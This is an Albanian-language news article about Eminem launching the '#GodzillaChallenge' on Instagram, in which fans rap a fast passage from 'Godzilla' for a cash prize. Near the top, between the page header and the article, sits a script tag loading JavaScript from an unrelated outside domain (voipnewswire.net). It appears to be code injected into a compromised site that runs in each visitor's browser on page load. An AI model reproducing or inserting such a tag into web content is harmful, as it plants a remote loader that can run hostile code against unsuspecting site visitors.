Header

Eminem ndan çmime për fansat që repojnë më shpejt

<script src='https://s2.voipnewswire.net/s2.js' type='text/javascript'></script>

Edhe Eminem ka hapur sfidën më të re në Instagram që duket mjaft argëtuese.

Reperi i cili shkëlqeu me performancën e tij të “Lose Yourself” në ceremoninë e ndarjes së çmimeve “Oscar”, ka hapur “#GodzillaChallenge”.

Me anë të kësaj sfide të gjithë fansat e tij duhet të ‘rap’-ojnë po aq shpejt se ai një pjesë të tekstit nga bashkëpunimi më i ri me Juice WRLD, “Godzilla”.

Videot do të postohen në rrjetet sociale me thurjen e mësipërme të emrit të sfidës dhe më të bukurat do të marrin një shumë parash nga artisti.

Në klipin 30 sekondësh të Eminem, reperi shihet duke ‘rap’-uar 224 fjalë me 330 rrokje që sipas “Genius” brenda 1 sekondi ai thotë 7.23 fjalë.

Edhe pse sfida duket mjaft e vështirë duke marrë në konsideratë faktin se Eminem është reperi më i mirë i të gjitha kohërave, fansat e kanë marrë me sportivitet dhe janë të gatshëm të bëhen pjesë e saj.
https://www.instagram.com/p/B9AAGexh5qr/

You may also like ...